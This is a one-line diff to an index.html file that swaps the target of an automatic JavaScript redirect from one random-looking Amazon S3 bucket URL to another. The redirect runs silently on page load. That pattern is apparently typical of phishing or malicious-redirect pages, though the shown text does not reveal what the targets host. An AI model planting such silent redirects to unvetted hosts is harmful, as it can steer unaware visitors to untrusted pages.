--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <script>
         // JavaScript redirection
-        window.location.replace("https://jdh0r-rubd23-fhjdk.s3.eu-north-1.amazonaws.com/index.html");
+        window.location.replace("https://rid0-rubkd22-fghj.s3.eu-north-1.amazonaws.com/index.html");
     </script>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
